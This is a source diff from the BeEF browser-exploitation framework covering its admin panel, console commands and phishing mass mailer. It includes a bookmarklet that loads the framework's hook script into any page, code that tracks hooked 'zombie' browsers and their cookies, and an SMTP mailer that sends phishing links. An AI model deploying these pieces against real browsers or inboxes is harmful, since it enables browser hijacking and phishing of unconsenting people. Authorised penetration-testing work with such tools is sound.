['Browser Components', 'Foxit Reader', 'HasFoxit'], ['Browser Components', 'Foxit Reader', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'], ['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'], ['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'], ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

2
extensions/admin_ui/controllers/panel/index.html
View File

@@ -60,6 +60,8 @@
<body> <body>
<%= nonce_tag %> <%= nonce_tag %>
<div id="header"> <div id="header">
<div class="left-menu" id="header-right">
</div>
<div class="right-menu"> <div class="right-menu">
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> <img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |

2
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -88,6 +88,7 @@ module BeEF
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears') has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled') has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_webrtc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX') has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight') has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime') has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
@@ -113,6 +114,7 @@ module BeEF
'has_web_sockets' => has_web_sockets, 'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears, 'has_googlegears' => has_googlegears,
'has_java' => has_java, 'has_java' => has_java,
'has_webrtc' => has_webrtc,
'has_activex' => has_activex, 'has_activex' => has_activex,
'has_silverlight' => has_silverlight, 'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime, 'has_quicktime' => has_quicktime,

13
extensions/admin_ui/media/css/base.css
View File

@@ -5,13 +5,24 @@
*/ */
#header .right-menu { #header .right-menu {
width: 300px;
float: right; float: right;
margin: 10px; margin: 3px 3px 0 4px;
word-spacing: 5px; word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica; font: 11px arial, tahoma, verdana, helvetica;
color:#000; color:#000;
} }
#header .left-menu {
width: 300px;
float: left;
margin: 10px 4px 0 20px;
word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica;
font-weight: bolder;
color:red;
}
#header a:link, #header a:link,
#header a:visited { #header a:visited {
color:#000; color:#000;

22
extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
View File

@@ -42,19 +42,39 @@ Ext.onReady(function() {
* This event updater retrieves updates every 8 seconds. Those updates * This event updater retrieves updates every 8 seconds. Those updates
* are then pushed to various managers (i.e. the zombie manager). * are then pushed to various managers (i.e. the zombie manager).
*/ */
var lastpoll = new Date().getTime();
Ext.TaskMgr.start({ Ext.TaskMgr.start({
run: function() { run: function() {
Ext.Ajax.request({ Ext.Ajax.request({
url: '/ui/panel/hooked-browser-tree-update.json', url: '/ui/panel/hooked-browser-tree-update.json',
method: 'POST', method: 'POST',
success: function(response) { success: function(response) {
var updates = Ext.util.JSON.decode(response.responseText); var updates;
try {
updates = Ext.util.JSON.decode(response.responseText);
} catch (e) {
//The framework has probably been reset and you're actually logged out
var hr = document.getElementById("header-right");
hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
}
var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null; var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null; var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
if(zombiesManager && hooked_browsers) { if(zombiesManager && hooked_browsers) {
zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules); zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
} }
lastpoll = new Date().getTime();
var hr = document.getElementById("header-right");
hr.innerHTML = "";
},
failure: function(response) {
var timenow = new Date().getTime();
if ((timenow - lastpoll) > 60000) {
var hr = document.getElementById("header-right");
hr.innerHTML = "Framework is down";
}
} }
}); });
}, },

9
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -6,6 +6,10 @@
WelcomeTab = function() { WelcomeTab = function() {
var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
welcome = " \ welcome = " \
<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \ <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
<p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \ <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\ <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
<p>Welcome to BeEF!</p><br /> \ <p>Welcome to BeEF!</p><br /> \
<p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \ <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
<p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
<p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \ <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\ <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
<p>To interact with a hooked browser simply left-click it, a new tab will appear. \ <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
</div>\ </div>\
"; ";
WelcomeTab.superclass.constructor.call(this, { welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
WelcomeTab.superclass.constructor.call(this, {
region:'center', region:'center',
padding:'10 10 10 10', padding:'10 10 10 10',
html: welcome, html: welcome,

18
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -27,10 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_web_sockets = zombie_array[index]["has_web_sockets"]; var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"]; var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"]; var has_java = zombie_array[index]["has_java"];
var has_webrtc = zombie_array[index]["has_webrtc"];
var has_activex = zombie_array[index]["has_activex"]; var has_activex = zombie_array[index]["has_activex"];
var has_wmp = zombie_array[index]["has_wmp"]; var has_wmp = zombie_array[index]["has_wmp"];
var has_vlc = zombie_array[index]["has_vlc"]; var has_vlc = zombie_array[index]["has_vlc"];
var has_foxit = zombie_array[index]["has_foxit"]; var has_foxit = zombie_array[index]["has_foxit"];
var has_silverlight = zombie_array[index]["has_silverlight"]; var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"]; var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"]; var has_realplayer = zombie_array[index]["has_realplayer"];
@@ -47,14 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Hardware: " + hw_name; balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port; balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash; balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java; balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets; balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>WebRTC: " + has_webrtc;
balloon_text+= "<br/>ActiveX: " + has_activex; balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight; balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime; balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>VLC: " + has_vlc; balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>Foxit: " + has_foxit; balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>RealPlayer: " + has_realplayer; balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears; balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp; balloon_text+= "<br/>Date: " + date_stamp;
@@ -67,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
'balloon_text' : balloon_text, 'balloon_text' : balloon_text,
'check' : false, 'check' : false,
'domain' : domain, 'domain' : domain,
'port' : port 'port' : port
}; };
return new_zombie; return new_zombie;

20
extensions/admin_ui/media/javascript/ui/panel/common.js
View File

@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value); html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
html += '<p>'; html += '<p>';
for(index in record.data.data) { for(index in record.data.data) {
result = record.data.data[index]; result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
index = index.toString().replace('_', ' '); index = index.toString().replace('_', ' ');
//output escape everything, but allow the <br> tag for better rendering. // Check if the data is the image parameter and that it's a base64 encoded png.
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>')); if (result.substring(0,28) == "image=data:image/png;base64,") {
// Lets display the image
try {
base64_data = window.atob(result.substring(29,result.length));
html += String.format('<img src="{0}" /><br>', result.substring(6));
} catch(e) {
beef.debug("Received invalid base64 encoded image string: "+e.toString());
html += String.format('<b>{0}</b>: {1}<br>', index, result);
}
} else {
// output escape everything, but allow the <br> tag for better rendering.
html += String.format('<b>{0}</b>: {1}<br>', index, result);
}
} }
html += '</p>'; html += '</p>';
return html; return html;
} }

10
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
View File

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
id = data.id; id = data.id;
}, },
error: function(){ error: function(){
console.log("Error getting module id."); beef.debug("Error getting module id.");
} }
}); });
return id; return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
async: false, async: false,
processData: false, processData: false,
success: function(data){ success: function(data){
console.log("data: " + data.command_id); beef.debug("data: " + data.command_id);
result = "Command [" + data.command_id + "] sent successfully"; result = "Command [" + data.command_id + "] sent successfully";
}, },
error: function(){ error: function(){
console.log("Error sending command"); beef.debug("Error sending command");
return "Error sending command"; return "Error sending command";
} }
}); });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
processData: false, processData: false,
success: function(data){ success: function(data){
$jwterm.each(data, function(i){ $jwterm.each(data, function(i){
console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
results += $jwterm.parseJSON(data[i].data).data; results += $jwterm.parseJSON(data[i].data).data;
}); });
}, },
error: function(){ error: function(){
console.log("Error sending command"); beef.debug("Error sending command");
return "Error sending command"; return "Error sending command";
} }
}); });

39
extensions/console/lib/command_dispatcher/command.rb
View File

@@ -10,9 +10,18 @@ module CommandDispatcher
class Command class Command
include BeEF::Extension::Console::CommandDispatcher include BeEF::Extension::Console::CommandDispatcher
@@params = []
def initialize(driver) def initialize(driver)
super super
begin
driver.interface.cmd['Data'].each{|data|
@@params << data['name']
}
rescue
return
end
end end
def commands def commands
@@ -41,12 +50,16 @@ class Command
} }
print_line("Module name: " + driver.interface.cmd['Name']) print_line("Module name: " + driver.interface.cmd['Name'])
print_line("Module category: " + driver.interface.cmd['Category']) print_line("Module category: " + driver.interface.cmd['Category'].to_s)
print_line("Module description: " + driver.interface.cmd['Description']) print_line("Module description: " + driver.interface.cmd['Description'])
print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0 print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
driver.interface.cmd['Data'].each{|data| driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label']) if data['type'].eql?("combobox")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
else
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
end
} if not driver.interface.cmd['Data'].nil? } if not driver.interface.cmd['Data'].nil?
end end
@@ -80,6 +93,16 @@ class Command
print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values") print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
print_status(" Usage: param <paramname> <paramvalue>") print_status(" Usage: param <paramname> <paramvalue>")
end end
def cmd_param_tabs(str,words)
return if words.length > 1
if @@params == ""
#nothing prepopulated?
else
return @@params
end
end
def cmd_execute(*args) def cmd_execute(*args)
@@bare_opts.parse(args) {|opt, idx, val| @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
]) ])
if args[0] == nil if args[0] == nil
lastcmdid = nil
driver.interface.getcommandresponses.each do |resp| driver.interface.getcommandresponses.each do |resp|
indiresp = driver.interface.getindividualresponse(resp['object_id']) indiresp = driver.interface.getindividualresponse(resp['object_id'])
respout = "" respout = ""
@@ -126,6 +150,7 @@ class Command
respout = "No response yet" respout = "No response yet"
else else
respout = Time.at(indiresp[0]['date'].to_i).to_s respout = Time.at(indiresp[0]['date'].to_i).to_s
lastcmdid = resp['object_id']
end end
tbl << [resp['object_id'].to_s, resp['creationdate'], respout] tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
end end
@@ -133,6 +158,16 @@ class Command
puts "\n" puts "\n"
puts "List of responses for this command module:\n" puts "List of responses for this command module:\n"
puts tbl.to_s + "\n" puts tbl.to_s + "\n"
if not lastcmdid.nil?
resp = driver.interface.getindividualresponse(lastcmdid)
puts "\n"
print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
print_line("Response:")
resp.each do |op|
print_line(op['data']['data'].to_s)
end
end
else else
output = driver.interface.getindividualresponse(args[0]) output = driver.interface.getindividualresponse(args[0])
if output.nil? if output.nil?

35
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -141,13 +141,14 @@ class Core
[ [
'Id', 'Id',
'IP', 'IP',
'Hook Host',
'Browser', 'Browser',
'OS', 'OS',
'Hardware' 'Hardware'
]) ])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie| BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')] tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end end
puts "\n" puts "\n"
@@ -174,12 +175,14 @@ class Core
[ [
'Id', 'Id',
'IP', 'IP',
'Hook Host',
'Browser', 'Browser',
'OS' 'OS',
'Hardware'
]) ])
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie| BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')] tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end end
puts "\n" puts "\n"
@@ -283,12 +286,21 @@ class Core
offlinezombies << zombie.id offlinezombies << zombie.id
end end
if not offlinezombies.include?(args[0].to_i) targets = args[0].split(',')
print_status("Browser does not appear to be offline..") targets.each {|t|
return false if not offlinezombies.include?(t.to_i)
end print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
return false
end
#print_status("Adding browser [id:"+t.to_s+"] to target list.")
}
# if not offlinezombies.include?(args[0].to_i)
# print_status("Browser does not appear to be offline..")
# return false
# end
if not driver.interface.setofflinetarget(args[0]).nil? if not driver.interface.setofflinetarget(targets).nil?
if (driver.dispatcher_stack.size > 1 and if (driver.dispatcher_stack.size > 1 and
driver.current_dispatcher.name != 'Core') driver.current_dispatcher.name != 'Core')
driver.destack_dispatcher driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
if driver.interface.targetid.length > 1 if driver.interface.targetid.length > 1
driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
else else
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
end end
end end
@@ -327,7 +339,12 @@ class Core
driver.run_single("offline") driver.run_single("offline")
when 'commands' when 'commands'
if driver.dispatched_enstacked(Target) if driver.dispatched_enstacked(Target)
if args[1] == "-s" and not args[2].nil?
driver.run_single("commands #{args[1]} #{args[2]}")
return
else
driver.run_single("commands") driver.run_single("commands")
end
else else
print_error("You aren't targeting a zombie yet") print_error("You aren't targeting a zombie yet")
end end

46
extensions/console/lib/command_dispatcher/target.rb
View File

@@ -18,7 +18,7 @@ class Target
begin begin
driver.interface.getcommands.each { |folder| driver.interface.getcommands.each { |folder|
folder['children'].each { |command| folder['children'].each { |command|
@@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
} }
} }
rescue rescue
@@ -40,17 +40,29 @@ class Target
@@bare_opts = Rex::Parser::Arguments.new( @@bare_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help." ]) "-h" => [ false, "Help." ])
@@commands_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help."],
"-s" => [ false, "<search term>"],
"-r" => [ false, "List modules which have responses against them only"])
def cmd_commands(*args) def cmd_commands(*args)
searchstring = nil
responly = nil
@@bare_opts.parse(args) {|opt, idx, val| @@commands_opts.parse(args) {|opt, idx, val|
case opt case opt
when "-h" when "-h"
cmd_commands_help cmd_commands_help
return false return false
when "-s"
searchstring = args[1].downcase if not args[1].nil?
when "-r"
responly = true
end end
} }
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Columns' => 'Columns' =>
[ [
@@ -63,10 +75,29 @@ class Target
driver.interface.getcommands.each { |folder| driver.interface.getcommands.each { |folder|
folder['children'].each { |command| folder['children'].each { |command|
tbl << [command['id'].to_i,
folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"), cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
if not searchstring.nil?
if not cmdstring.downcase.index(searchstring).nil?
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""), command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] #TODO driver.interface.getcommandresponses(command['id']).length] #TODO
end
elsif not responly.nil?
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
else
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] #TODO
end
} }
} }
@@ -78,6 +109,9 @@ class Target
def cmd_commands_help(*args) def cmd_commands_help(*args)
print_status("List command modules for this target") print_status("List command modules for this target")
print_line("Usage: commands [options]")
print_line
print @@commands_opts.usage()
end end
def cmd_info(*args) def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
else else
driver.interface.getcommands.each { |x| driver.interface.getcommands.each { |x|
x['children'].each { |y| x['children'].each { |y|
if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
modid = y['id'] modid = y['id']
end end
} }

11
extensions/console/lib/shellinterface.rb
View File

@@ -302,6 +302,7 @@ class ShellInterface
['Browser Components', 'Windows Media Player','HasWMP'], ['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'], ['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit', 'HasFoxit'], ['Browser Components', 'Foxit', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'], ['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'], ['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'], ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -310,7 +311,7 @@ class ShellInterface
['Hooked Page', 'Page Title', 'PageTitle'], ['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'], ['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'], ['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'], ['Hooked Page', 'Hook Host', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'], ['Hooked Page', 'Cookies', 'Cookies'],
# Host # Host
@@ -328,22 +329,22 @@ class ShellInterface
case p[2] case p[2]
when "BrowserName" when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2])) data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
when "ScreenSize" when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width'] width = screen_size_hash['width']
height = screen_size_hash['height'] height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth'] cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}" data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize" when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width'] width = window_size_hash['width']
height = window_size_hash['height'] height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}" data = "Width: #{width}, Height: #{height}"
else else
data = BD.get(zombie_session, p[2]) data = BD.get(self.targetsession, p[2])
end end
# add property to summary hash # add property to summary hash

2
extensions/social_engineering/config.yaml
View File

@@ -21,7 +21,7 @@ beef:
use_auth: true use_auth: true
use_tls: true use_tls: true
helo: "gmail.com" # this is usually the domain name helo: "gmail.com" # this is usually the domain name
from: "youruser@gmail.com" auth: "youruser@gmail.com"
password: "yourpass" password: "yourpass"
# available templates # available templates
templates: templates:

68
extensions/social_engineering/mass_mailer/mass_mailer.rb
View File

@@ -20,14 +20,14 @@ module BeEF
@host = @config.get("#{@config_prefix}.host") @host = @config.get("#{@config_prefix}.host")
@port = @config.get("#{@config_prefix}.port") @port = @config.get("#{@config_prefix}.port")
@helo = @config.get("#{@config_prefix}.helo") @helo = @config.get("#{@config_prefix}.helo")
@from = @config.get("#{@config_prefix}.from") @auth = @config.get("#{@config_prefix}.auth")
@password = @config.get("#{@config_prefix}.password") @password = @config.get("#{@config_prefix}.password")
end end
# tos_hash is an Hash like: # tos_hash is an Hash like:
# 'antisnatchor@gmail.com' => 'Michele' # 'antisnatchor@gmail.com' => 'Michele'
# 'ciccio@pasticcio.com' => 'Ciccio' # 'ciccio@pasticcio.com' => 'Ciccio'
def send_email(template, fromname, subject, link, linktext, tos_hash) def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
# create new SSL context and disable CA chain validation # create new SSL context and disable CA chain validation
if @config.get("#{@config_prefix}.use_tls") if @config.get("#{@config_prefix}.use_tls")
@ctx = OpenSSL::SSL::SSLContext.new @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
n = tos_hash.size n = tos_hash.size
x = 1 x = 1
print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:" print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
print_info "subject: #{subject}" print_info "subject: #{subject}"
print_info "link: #{link}" print_info "link: #{link}"
print_info "linktext: #{linktext}" print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
if @config.get("#{@config_prefix}.use_auth") if @config.get("#{@config_prefix}.use_auth")
smtp.start(@helo, @from, @password, :login) do |smtp| smtp.start(@helo, @auth, @password, :login) do |smtp|
tos_hash.each do |to, name| tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template) message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to) smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent." print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1 x += 1
end end
end end
else else
smtp.start(@helo, @from) do |smtp| smtp.start(@helo, @auth) do |smtp|
tos_hash.each do |to, name| tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template) message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to) smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent." print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1 x += 1
end end
@@ -67,33 +67,39 @@ module BeEF
end end
end end
